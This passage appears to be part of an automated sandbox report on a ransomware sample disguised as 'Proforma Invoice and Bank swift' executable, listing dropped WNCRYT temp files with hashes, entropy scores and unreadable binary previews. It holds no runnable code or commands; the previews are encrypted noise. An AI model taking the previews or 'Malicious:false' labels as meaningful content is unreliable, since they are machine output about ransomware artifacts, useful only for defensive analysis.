                                                          Preview:o......bx.`..r..C*./<N.?.'.ZJ.Y.......3.c.;............?......4...2..6<cM.2,...t.bM........H}..].|..gVt..!M.L.kA.7l(..Ti.x....=.p...&.zsY.}."m1.LQ...8.d.qb.Z^..Q17..V!..nH?....|=.Y.t.G&._Lf.WVK.'SD...\..2...._1z...ZNJ&.Q........b.<.h.b...h.*...S.m;....f...7y.7.\..R....#l.!.i...^..P.....+AG...I.f.9...E.s.....$...;i..[.[-@..E.......U..*,J.u..j.w9.lw.....^..'.M...~.5..c.......`..m{.Em.9.Y<?+.....m..;..]....>e.$B..m.Td.I:...._.~",6.)....d;...wj.R.ZM6Z.W]*.X.....r...r.",b.....*.I....Ha3.B b.5..n.2m_[..F..=-c...7~]...`...T.......:0.W.G..{...U.....K.]..2e....i...^...}%.f..OMilX*.E.8*.g....`..m.J..p.].}.n|....VtE.?./...U..x..;..9.1..]...u.|F..Q..m....;R..:..c....}m..Y.!.0...n.|...k.3.Z...?#.n.+...c..-%.I...^O.B....F$.<...x7ek."1'.AV.A..?W..z..t..*....L.R[..$yB..s;?........~..t.....^....2...$h..*......w.3e.S.l....9...!...F7..z.`.b..|.....Ma.%..n...x0...+.Jh.._2<.".no<.....A.....?!r..].tk=].....O.w.m..{.u.pv$...U.....7...e.&.HU.G.?H...6cF...rv.T

                                                          C:\Users\user\AppData\Local\Temp\23.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818747812713695
                                                          Encrypted:false
                                                          SSDEEP:24:kE1qtfuYLsiyw6xccbFGf+EXMd4jMyMmyDR+ynG:ahLnIcM9EcywyMm2+yG
                                                          MD5:87A3289919D902E00991C3BBDC02D52E
                                                          SHA1:89AA89FD74E33D7CD16930BA8AF7DEAD6C442BCB
                                                          SHA-256:FACCBD7C756879525B9748926A7249DC2AC0B36C8E07E26980038DD43C74B36F
                                                          SHA-512:87639FC69461EDEA45E7DA8D4D43CDC05BC9CCBF996AC5BF6116F348D9259214EB245BA379B7E0F558B17FB4A80EE2A788D8C19ACAFFDC4B4182B35095D64AAB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.N.Ue.9qW.rA ..MK...&.......6.k.N....`T....9!.........;......`O.....nv].'\..X..8..m............R.....S.I...--....8....$1.}.D......B....(MQ.m:.*HK..ZH.V.5YV....5.p-csp.....th.D..a\>...A.F.T....t..tM....S.^v#V..>/./.P..k...O..G.A..N.....?|........L..3..x...........f}<..H...V.&.s;F..Jp...^5$.~.S.05w;...P.bp.I~...8...3s...`.k..........3..N.8...]?...!wz....;..4.....B...z.H...H.....B..V..GH....M..'...+."sS'z...^$^.A+!.z..49L...5-{..1...3...i...{.'.$..7.'...4).._..$.....W...*...B.......?......;i%.....Nd#f.$..*"h..{6..[_..gZ..<.@...I..........<0..Q....\.....E..~L.1....%`0..TI../.-u......I.I.....}.a.W.&.lX...f..v..B.>c.TP.c..O.K....#.g.U`ov....5...".9./`.....Bp.ow....\.....W.QL...H.n-.)...9..n.s.x0._o<....-.O<...V..GD} 1.........0.O..Ss.?K........z..$6..x..'`........w[.3Q..Z..1....A.....I.*...m.....G..Qg...f.'...].|.q....e...Q.....>.... ......n)(./]..2.S.^m.% .Z..'.sB.D~.%o.+.Ab...:.%X.w@=..t[...F..9.=....}.@.R,%..|..{....|H.

                                                          C:\Users\user\AppData\Local\Temp\24.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.832827341428288
                                                          Encrypted:false
                                                          SSDEEP:24:LcB6+1heTLyluXDqj8+6BRERf7VUiwEqa669monhywqEz:YK+j8vRnXEqaNbqEz
                                                          MD5:22C5A33A6BA983F132372BE3E55C3B26
                                                          SHA1:DF22B1B6D4541DD85954FECEC9EA0B83E74447DD
                                                          SHA-256:078E3F647D6BEC1E1329DC9C494D4FCE13E603DE522DF2321C05ED31FB7DB564
                                                          SHA-512:1ACB06345AC8333DC0E59B11A11AF47C9313CF7138F992E1C2743DD53ADB6A7FE537E5BF75F5D37BBD16391D08765ACAFC2E8EB2AE5837F655F2AA9391B87C5E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:~...L.L..5.oVM:..k:.:D.J..p.Q.....y.U...D..,.......{.....{.v.f?...^.......GO.........mq....a.....n..:bk.9#.z..k..Q.-.E..A.)42i.=.+.~....1.?-.r"l...?.-...x.....Y..:..C/...i;.....BmV.4W.q.(.........F...r.s.D.9V...g$I...s..M.O."._.y.FJ.ff..;%..!(..<"..zK.0*q.-...&.B#.....V.(}....[wYM.l:..2N...OQ.,.%.F.<..;..W.Z..VV.q2$.;p.48,7.1.2Iy"..V.....4....xR....TE...Z....'=%...8W........q..Bt..Q0o8.Y...U..q....0.OF|.<..t.$..c......z6K>..e........{V<.`J.[.6.:d.)...v0..S.H{w..p.)......2E._....}.CW.J....25/y.>.k).....S(.M...R.r.i.Fv...:IMK....,.<.Nn.AFBl.pT#5n.....3\.s.c.p..>/.......T..-......E.(A.-...*."..d....e9JJ.f..6q...\K....N..H....0.h.w.E.x....S...E........)..x...N.........SF'...4...P).M/V..Dh../.V5...9+.Z...h..&>.....[.t._rz5....%S+....X.U.\./K^....nY.p...^..!A......PK..0...RW. ....|8cI.h+..t..^Z6.w...1......!]......Id.5.....'N..p.h....Y5...">...A. ...v.u.N.W.....c.&9..Z .....C..........u.!...G......rT*..%.......W5.........i.....M

                                                          C:\Users\user\AppData\Local\Temp\25.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826689884175093
                                                          Encrypted:false
                                                          SSDEEP:24:RBCrT1s5KyOgAGnQq+6AdsNtQ+OXrZzfwzwhE4N9v2vQTiO01ymnYjvy+:nCKOTtqvAAt4hQw3N9vqi08/
                                                          MD5:FFBFA8DAF53DAC951942B5C6CAF2B4C0
                                                          SHA1:AA60CACA2F4C8C1930A568E90FB0335B65871AF0
                                                          SHA-256:A3DE99F7899D785533F74E70F868A19919EB778418B5686C3E9B6C2119E80607
                                                          SHA-512:454F45AE5F0CA8A322EACA0629EE21FE5FB2F15B41F77E5B611B99E730623C6CCCEC7438E6ABA3E512ABF00BAEFD3F91B8DD79D10B323E00C9CB89EA206AA987
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.G...2..]......`.4."..? ){........"(.....]..!."...7Fu..G..v.r.F...k..{@.0...!..i.F.S.....x.E.T.a..(..2.^.H.-e.w.W...#....9....b3X..J.....~.k.m..O.~/.|M....j.[d....U.>..1...m..Gz.|.k@..l).....g...r....:d.j..GR...xv.0v.DF..C...`..C5wJ7.....q5k...0...Q2...[...a.1b....+.....H.cI..cA.!.c.,.<.4..m.d....X.<.vS.g..-.).j..L.iW..m..;..f.WG....&.../_......{d.4?O... .....m0..../.h.>`.-..3..D...;p...(..Y..9.?.Q.@a.......T_p.]S...(...R ..$.e.#^.y..P..$a.FnN..0.-3.c#...E"....]....h..$.8t2.7...{s.`J.?I.......H...K..\C`=..0y:v.....L....#.1.d.$...~.P.8Y.T....YLM).X`.9..Nx..O.U....H...M.O.T.{.Y9K..uH.........i......N..8......Rkx.Y.}.......l/|.d.p.}..&GAFB...Aq....X^....^....WO|^...V"...l..a...c.VCk.'u..^M./\5jK...+...Mu C<&B..".O.d....`_.n...T.%..n.RT........M...@.8.y.\.!.$...$.;@.?u.c...p.E...E.....0..6?Mp..V.Z...HJ.f..f.....}..#.}....+..|.-6..ch...$..7.Yn.AB..'N....x)..-n.u.'...5.....A.3.zz..fJ.{..I/.y...z....R.p...<.v..V...1-..._C...K.X.>....'W..o..

                                                          C:\Users\user\AppData\Local\Temp\26.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80013066252563
                                                          Encrypted:false
                                                          SSDEEP:24:Z8/Sct4O6ep9XRM8DbKr5e5fl+yvVoMHT9PY465aCYNrZoK+:2ShFIhbKrE5fQ4HTR+cbb+
                                                          MD5:B300E58CABF45FF5A8BD9D47CD32CB1B
                                                          SHA1:75AC4DBC04311F52849598DE4A2358CF97445B82
                                                          SHA-256:706966E9CC902908CE965008DA4BE7FAC363A0A5CED0A606CA09ADC85E217698
                                                          SHA-512:BDF5051F0B6D80A3CF5DB438CE4D1B4267B0DBF098DDD514273A7E34E6C6128AB11CE29A4A0FBAEA501B17983DB075BC5CF2226BCBC0BA3FC59C8E0CFAAE6AAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:3...c+..8.w.[a....}....'.....o.6B./.PYd!1..&..%..c...%.$.)%{...G...S..Jc...mM[.....[tD-..n....\..>...........h~.T.....<......w.......[S...5.A6.h...t0M.G....&.v%..YL)0a...d^........s..6 ."....E..j.3.....W.n...........~d.a...../.)....@...Ueu..B"`.O^....2n..!.5.....R#..d...]..}c."z;X..R(;/...gY..=....h....4a!..F...X...Vf.A.L...4..*../N......v....w......cC....~.(..[..w......).sz.1~..$m.\#".....z..8.qO'R#qq.w..z.k...N!..GxV...P..5.... er6..o..U.....S......tX....x...I.S;..*...4v..A..U.............%=Y....../9.L..r.....I.W....a...u.s.0Y......]...}.......i...z.....i......X......^.',8D..2y........B.t.(.u.c.x....-.0'..r;K.......P......7.Z.X.....S.)..n.*\w..>.?qh`f.S.(.DHV.Y..DQ{..de.}q..~t........> ....[.}...{..EM....x{..".z.CX..9....sH;.^..k "V...rl6....{yG}.N.~.......x5f\=.....$L50._~]#..w.I...%#...{.".I^.*.......s../a....05`v.(].^.....I.r....l.D.?'.Yyt..z)=|...o.-..{.G..>QF...x..eH.[......:..0&U.i...y......_........Eb.0....pqU%k.5...v.O.

                                                          C:\Users\user\AppData\Local\Temp\27.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:BS image, Version 31555, Quantization 22622, (Decompresses to 16009 words)
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8164765808707966
                                                          Encrypted:false
                                                          SSDEEP:24:CkHHIoLi25GU1tgkBmefxQwpyTgTHLqybCL1n:C8Hxr1GkAKQ7TgTHOyb0p
                                                          MD5:1333840F9C482FD6057A57A17A3FBBB8
                                                          SHA1:3BFC9BF5B9396639E2F2CCD02CE459D4EDA3DE0E
                                                          SHA-256:A59F15B31F3B134109F7D0AE6B0730D99FFD8419CF232E214D7F0C8C4FFFC751
                                                          SHA-512:FB362F7FF2320172A96580FDBF8B968D2D066F09FFC65DA1D0B60050925C8BC6F5F5F3DF506551BEA54BA0C4545DABDFAA06081D191456DD79AE6AB967DBACBA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.>.8^XC{...gs.W...~+... .^/..V+....A..C....0.y..Z...>N"..6].g..]X....~;..t.fN..=.'..\9.H.h....4.*..\...`.b.....[.....9...X)........k....."D2..#.@....y.G..|....(...\....".}d..).......i\..z.]5.3c^t.T.......:.b@q..)>.4....].<8f..1+..:&i.Ci_eC..".c.w.-.X.l..e)...U...R.4[.[..............`GL.M........LMj.".X.)..[".. ._$y.9..!...,.{n....... ..l..A.k...s.....@+i!...q"..6. >.j/...#.{...d%23.E.L.(.........XF?...4.fr.......4.....v.f.."...)@....I..;...Isn.z.'...X_TCo......P..TS.Xx......qo.........Eaa...P..cJ...~L....CE.(.gE....O..Y&g...u.....xB.2.Rx....I.o(.I/"........OT..F.K..UW.....y.~B.=Y.....+!........_..T....L2.j..b}kXj.2,....{.6>.SO&..kc......t"..yc]....n.b...s{6<...D...g.<...jqN.g.".....WIs...BO$..Qc..Zuqi!........#..y.s....}....+.O})..YP..."..<EnE/.O._JX...[......m...G.,/M..?...R...5.............HQ.A....(.a.R..S.}.9-..ry..q4....#9..._..'..$Xv...Q.......Y.......^.[p..c..J..I..).........n.C.n..?!..".Z..G........A..I.(...h.?...I..`D....

                                                          C:\Users\user\AppData\Local\Temp\28.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.813555557528846
                                                          Encrypted:false
                                                          SSDEEP:24:EanHVB7M/oUHw2bFktU4mkYcmgzRgKpEG6YXG:Ean1B7coUHw2bFN/PWJpA
                                                          MD5:5D88D73D86A047F3AB67CC014F7EF224
                                                          SHA1:4F47FB653E30BFC132ADC1CCE2EE82C975B737F0
                                                          SHA-256:E84A1E76D5A599E758CC3B9B96CA8B92E009CA02FE8A2460C47EC7008B605855
                                                          SHA-512:FD9EECFB1D440101995C0A06B054F8B3B52ED0DB3AC6A6D563858C5F5D2B9CE4F56B95B59C531E6DF64DA1FD0832834E5E30A66D2976AC60C513CA9D1E77C034
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:....y..3ok.r.Y.......b~..XxM*.x.O..-.....<...u.....!..|..^1XjR...]h.c.a.g.:.\.`..;F.1...;>......*..CM..26.a...{.{..K*kR.......ea.....zY..../..)...O.u..b._.%.ab../P.Gx....ZF.jD,. ..]l>.p......!..R....w..?..ld..Y..J.0...w....\VA2.Y..k$.......d...vz...8...UR.ET...C.y..n......(...._...<@..A.h.=.l..1AV"?[..>.d.%.b..d...l.0.&....Jq.Q. d.n...lRA.1IJ.W.......9.Wj8.W....K-....Uq...n.j.D.Xi.8l5...5'Y....7.._....z..9w.}.k..V.].)...BQ....S..\&.dQ.5.A..%.. )@..........o.Z1.'D..O...<^|..[.......7g......Y.(&X..8..}........,z....5.}.`..b.JF.+.1.......`U.i...'fig..,V....(d..eKw.W(.X.Q/........i......u6C..C.G...IC.G>....$..2.......v.1..Z......!z.S..|...6<......fN#......|...;.|...U......< {W..B^~.yOq.cF|.!X|Gq.=_.%.B.\..;.....<!.O..x........]vJ^c.c....Q. ....m................c...n..L.>O..4.P.5..3C..^....y....]....|.`F.F.....G.../....U.3..W{.2....Z..c..}{I4.^Ch'.f.........e.}.&k.ZNp\p...W...........H7zY.H.j.PM? ..?<...[....}].....0....5./..(....s.......:.

                                                          C:\Users\user\AppData\Local\Temp\29.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826740455017789
                                                          Encrypted:false
                                                          SSDEEP:24:ky5LyPprUNOB8Ew7Hdgjtz6j9VWZxnwazEnjZWrjt/CBXxnPatM:ky5ePi4BMgjtuGp/zEnj0KBxPam
                                                          MD5:1B9ADB6B79020F9EE44EEA448B9C2E22
                                                          SHA1:6813DB65A6C90F6F5B276439FD9F6928BCA7D949
                                                          SHA-256:F21E3BA556C85DFCD4D6E88F66A8712BBD64E7D4D4BE269924C736E0826B5652
                                                          SHA-512:BCA1F27555D78D7336CBE139EFC0B40C2EFF78FD518D8E1535FBEB668BEA1620FCABF5FF2DED2A8EA2530B360A0A837D0E32690D1672142EB7C843DFEF641ED9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.j....f.!.q.?.........T.)...Y.....[. .ncXy.c..n..:.#.2.^.....o.].NM.....Qe.FT.w...1e..V.P>."..9.A..D.!.........|..,Gu..^...}.t.G&?G#..y...U...<i6Ckp.o.)..96l..=....c..1.jX7%2.`......6...M....1....S.a.4..d,....... .S......n..1.m..c...YF.t./.....J.P.+../..5A\:.,L5..k...z.G.^Il.w..aU..f....J#.x...%...L.........._.X.y.[.....u+~..ET..}h..n..{.P0..}Y.%...E x..J.B.~.,+...kqX.j.;.Yy.f.;W.,`.S......A*2.....s...F....;}.Y....c@.L..z.K....Mz......Q..7..3......KO....4..:.k...j.%.5.a.|4$..(....a.a..ql..~...P...u....r.,U....&.......Z.f..#....,.)..<..+j...........G..~.P.h..d^.>=Z9.^j..t......5....4...=.&.N{O.1....R8.^^....?..?W..!t=.;..x...f....>.0\...9y..Wus._..J..p.2_.T...c.\..6.$....l.3.....i........NK(u...m...-.....x.C.-.-2....W.o..N...Q2.7...v.H......R.T.A.....0x.1..J*..1l.:nY)......*.2...1...O..g..8..Lsg...G..,.....e.......$.W.L...u.. ....P...........R....7 I.t4..B.z......<...V...1(Ol.k-!..;.`.'..6x.;.#$B......F..C.X....%.Pgb4.>)A0.....g.uK..

                                                          C:\Users\user\AppData\Local\Temp\3.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.776661021195404
                                                          Encrypted:false
                                                          SSDEEP:12:c72fWcMToiC0xbi3dOGm6UD+LEUg0Ctjz0GDj1PVe4ZzuwQOFOkNNTgkKW19vf3u:c7cWvNbmd4zV0MNjpY4zRfKqxUbr
                                                          MD5:DA7C2B06B8685341CB3AD4320603CABC
                                                          SHA1:ABFDCF496DC7304D68B005080555AF234CB04EAA
                                                          SHA-256:3A997457FADB69887B8AE9C8F4D21CDD8CBD61EB4CB6D6F6C5E862CEEE195EE4
                                                          SHA-512:7498FC9D1B7B34C54E78E59B0B78172183E769B03E40587676D34CBC29A6C322CB0F3D830393B1C5022D6004798D7B9DED0DEEA9CDD0E349AFC04B46E7509B07
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:}.!...........b....'......=.y:K.<...u)..\d..z.....G..2.....8.......r.."..CCQ...v\....D./8.E...1..T...X}vz.`.%...*V.Xg,w.,...3Z..F...F...\[$b.(HO..8........})....w!G..G.....6.M.F.......z..>c.cx.y......H......v.........#._..o.Z.jA.z..T...^......X..7._..'..&...-.L.".:.....{.....Z.z.3C.3.>.K..H#8C.nZ.......*...G.&.HG?0.E.v\.. N..".?^..a.p...y(-..m:.VK...3x.$...f.:...-../..j.SJ".x..3..Sw.*..?xH^X.d...kU..,..^..Q>.M.#.#.].Nn..6zq....J.".t.pM..6... ..^../.5..=1....oa ./...b..WO..._v.o.\.....=p.q`..z..l.).|...........S..z2......]W....3yw....k."E...tJu#..B.{...{...F.....+.G....I.B.u....#.w.x.D.`..a.S.xu.LA...+.F>./..Wb..u..%}..'-.i.V.{..a..]<_....j..+'.g.2......q.jv...+u.L.y....j#..w .{i.F...].U..'..Oo..H.u.......v..bn..s..&.......O.."..v....3.0D,f..X.2....m...5kXG.,j..A.0..(...m*!......P..$....is..3.F=!.i.....r\..HL6.....pQ?-.{......R.m..G.../.R.....xu........z.rk9.=..=...v....G..:...Q..lp....~....T...`.G.f.a.......a.#..Aiq........F.xQ.!.

                                                          C:\Users\user\AppData\Local\Temp\30.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.796433958163932
                                                          Encrypted:false
                                                          SSDEEP:24:tqa3zgyJjFt930WONc/eA8fRJBRecBHkhxOVX9KX4xIyp6F:tqOhFt9sS85JBgcGxO5oXeIyYF
                                                          MD5:E2C00131F909FE4E42CB182642A9DD32
                                                          SHA1:71ADAB836A6A366EA05B3B7D1241A5FC953A98A1
                                                          SHA-256:6B225032D4D58F79369B0C3351D110832D852738AD0B236ADE745D4E15839287
                                                          SHA-512:E6F58B02C8470F00F840FD899F5EA9A5CFC2957BE4DD7F006BF33E52C8F3D38BB23FEEE040CE3A79C539B6B1ECAB5CBAE1FF8ED21B3CEF4C1FC7DCA6DF46C534
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:....E...c..U......W.6..........T\(R....n...#...L.~....Ub.-N.y.|..N#;.P.p..5.)....B...x..9.L..t...f.u...OlC.xa#L...._t...K.6G.A...d..&...9..t.J.......a.."....:g.N4....6w..g...f!....L..y.D.....*.W..,......\.]KO.h.W.\......V....y....J.o.....i...X.9..../....d~..[....M.'2/O.b.2 .!..,.....v`.M..Pa..h....r.9d*..a=d.p,..TA.-..Ck...4...?4G..|)1....O.^.?.-.O.^...H..v8-......d..D...f.............\D3.X(>[.8..-23..R.,.Sq..[.l#kt.(..<.....V..fc..b.v!..F...........6.6HEY.:yg.........T....k&..37....N.5w.5..=.l.)......x.*M..}-.(%..0+...ov.F..\.d..NAx]b.....P.h"...n!-u...k%.J.!......j.D.u..].F..r.7...V...u....b.ETlC>.l4.d|..3....clc..C..`....i.F..N..4.....L...[...i.z.0..en......~V.....!..0.l....@...V..z.....$..L/....}h...w.4.az...R..T.-G..y-b....".....tN7M..0j.......9....TO..S..Vh./.^l#O.0n..}. ..1...&...\.(#.&mF...R@=......o...d...mRq.g....3..`..H!..Y....L...U.-g...5........\.Fz."x...f..P .._.0=+0n.....3..qWVb..j..4.4.Y.........$.V~f..e.-.n.U`..n.-...H

                                                          C:\Users\user\AppData\Local\Temp\31.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.810758549870751
                                                          Encrypted:false
                                                          SSDEEP:24:9d90c6w7EJRBjg1hPnCXFghSRhIL36doDeJg5cTQ7w5eIFhyyti:9d9v6zX+HCSh2SLqdeeJ7AIFzi
                                                          MD5:A8FB0D9DA12BC0ED3069A43F9523A76E
                                                          SHA1:64F12CB25542A4185A09A3CC01FBE01333A288F5
                                                          SHA-256:B3ACE87709EF359B262C7C91E4466D7C970651D348DEB75A25F28C386B7CB2B8
                                                          SHA-512:90722DAA590FAEFAE52FCFA3A02DC7F757B890EB90DF68937A86FB122ED50A5298E0F863ABF6B0612563A586ED3F85DD3B108E3D058451BAE98600842F310988
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:m.a........>a..=<MB...0.@. Yy..?f.W.*..F.q.....I.[......S\.%......0..|..u.N..J..n.b..3[?......NK.5s.2..........X.nHg.....D..6.y.!..!..s..E.k}..a..>K .Vz.../6..D.*.b..K..a.i.0<@n.....ZP."..W.....f.>.G=...A.X.%h....*z......?$$..!+.$!E>.}..{!...R."~._,....<..K:$........i...B...Xhi..,. .;.M`o....Z..d......wQ.9...t-.$...xW.G..^.Y........j..Br....j.G2..:.zY.*.....c~.EZ.7.\..w.&,.4.X.....h.*om...!.t..%k.X......g.N..}^..wt.7.c.0:(..(...{*.k#..d...N..r\....hC.cv=X.t...RF.;..'.@H.n8rd.B|~........&{.......a..a..J..f....L..Bk..K...."4Og..r.l.%......c..u...R.g.}..v..0....+.>..C..Rj.G..m.P..o."..k...l.H......<......\...J.:..k7..|.%...B}t.dO.:....[...5V.x.A........v.&nJ...m..(4.............X.,r.p.k3..:...l...j~.......a+.?......Hj..o.."..|xcY.........;.......g.I.^..qrh.qL.'..&.V...w.5....S.o....m....M...Q...<.1....~.....m..,."|..lDl/.jK....e.+\..t.Y... .J..6..ZU1.~..7..L.u..o.~.m4.....m..:^.._k.M,.7u....Q.cp.Y.p...............,&........N*.

                                                          C:\Users\user\AppData\Local\Temp\32.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81348050833733
                                                          Encrypted:false
                                                          SSDEEP:24:IZmmNtOsTXd6dcYWI+l8FdUhzGxgiciItOW5LGQkNl6pMSVqG8dcKr/ZZmPXjA3L:IZtXXdycYY2whCxht8OsqzNXSVqGNwZp
                                                          MD5:D0ED687EBF08BA1A0EA29BAB2BFCE09C
                                                          SHA1:FF4D4CC06F96BA11D63E4F35F315E6D277FB4D8E
                                                          SHA-256:C78B3B0B08E8D5D604B5885BDA88D7BA8FE7ADD8CE3E7F26EBF7FCFBCC791023
                                                          SHA-512:3E6A94EE9844445A8B05F4898213ABA6C834ECB61831B478D5409900A2B34157ACAE51B6724895B837173B59974077B30104858B5A48C0BAC6C2B211C725E411
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..f...w..d~.S..S....m.........J..I..c.?...5..........[.l>..../ ..j....w#..Eq..s7./]...d.....;..c.._SmC.m<..9.$%..#....-.....}...m@eCb.Y...}....#.6...z..S.>..F... .~?Qp..E&.q....r?@f ..:F_..#.K.c.......5.Y.E..X.........^L..D...*A...o. .Z...m..N.!..) O..>..&.p7....,..=..&S.(...Z.Z....L.g...l...^7.%.x...+y......&9(..z..M.w....S.Q=..K..5,....Z.W....L....}z.Ij...N.......#..S....1a....>(p..b...+.ba........<M.<.}.^.j...*%EE..7.f...^t...KUH-5..........R7...F..W.9...>....L..........Z.....v>t./b.5...p+.}...2.xb.%Y~........F.%..`......R..}...]..q.5.x!..{..MiP=.....n../....h..V~...udN.<Eb.^....%...........s........\...T..G...=-d4">. ..pX4....=..V..7...B..x...R.v.t..P....;Vk(.*.[...\2.......26.Mf..D..T..B.-.O<(:.)+Ku..?Q:!}.r...y?y)...2..-?B./.....o]....up@.@}G.5.....@.7......^...&.D.$...N.<w.....j....]kE.._.u.6....yE.../.S...F.6.pD.......i....8.1.R~......5.h........g...Kng1...4......+c.|*Yp.E.3.....oe.!F.6.........2e...O.wd.....>.....$..i.O...

                                                          C:\Users\user\AppData\Local\Temp\33.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812570552682323
                                                          Encrypted:false
                                                          SSDEEP:24:/z0FvCmTWgFZMqkIqkKwNHLd+Cx7UzBk62ThXueoePGnOJzn:/Iw6cqk6KwVdXA9kPTYeFPG6z
                                                          MD5:7D3B85F2F7A55D2CFD430DF3531406F9
                                                          SHA1:B001604DCCD7FA6E7326C9AC82974FEDD09A7A11
                                                          SHA-256:2FC0FB7D1E1DAF799884C1D98AF119A5C0B24D824EB9B144A5055C35A327DE13
                                                          SHA-512:6A465B3AFC6E9F21108A269FF5095FEA74C878AE8F98AF3458A5F65C78725B53283EF83B6C6C723B48994806FF56CD9765B77807FB6FE93659DD1579032EB6FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.Ir(o...D..*...%.7u..CJ~.%W.......A.awX..7...AQ..wt.....U'V/...M._f6D..=...k.....EA..\.i.f< .R*.V..k.F.q.&..~...;.HO....q.Ub..r....L...p%r....S.K....,.w..^..Q^#n.....(......)h...<...,.GWp......<.`5hX..p.I9...O;..T:w3.....a6u.nX..k4^}?v.g^j.)>.f...r....q.5..W...DnP:o......._8.. k..}i....v?......e.Q.@\.....0.K.'J.<!2......`;.h.F\.S.t&?\HX.1s4.*.....[...A....X...u`M..W..q..V.b.5..qHI..1)%J.........m.....{....@...|..X....u(..(Z.g"...|...{..` +..~/>.....#."....`.h*,.*l^sG....e.&.I..km....6......<.&}R...F..u....*..g.>....DZ...Nwy0..-*.'.)=...../..<. .~9.._..w...F.ZyY......h@.{4....B..gG.......|,.jK..(#.......>.+"..0t_N..n1........OF.3..}b..q.kwp..D.e ..n...FO.../.\.&.... .!..S..Z..'.$....S.....j...).d.:G............Y...S.~|.I...N.....NA.w.A........b.[..<...L.i.2..`.,n.}<b.}c.....9..H&.a*..m[.vO.b..>..._...0........g..V..(..X..v9.o....|!.i......1P.)..l.ZZW"...<.......z?...M.....Oc..W,.../o.S.F<`.s..G.1~)]..I......&8.,9..x{...d..2.Y.....7......(>....O."<

                                                          C:\Users\user\AppData\Local\Temp\34.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817591288804739
                                                          Encrypted:false
                                                          SSDEEP:24:Twq+0Y2iH+z/mp/pq8dAn/7WCe9lfezot36OuU+PqNA6NZ:Twq+Dr1pBqhDWCe9lfefNU+GX
                                                          MD5:13938768AABA77E4EA2EBA42E056555A
                                                          SHA1:97E63D613F2E5062629D8D2DFD7B9DF51C77D34C
                                                          SHA-256:B21062272ECB251542B342EC0E1460C21F3EDBEA3B8819DDE5A0DB234BB6CAFE
                                                          SHA-512:29FFDDB821ADB7DFA5D2EDBBDD0AB6C308A580807994D14B7C0A93ADA3C58EA8FB4E0D8CAA9C08594867BB5102C5952508D815EECD093927A5883713377508FE
                                                          Malicious:false
                                                          Reputation:unknown
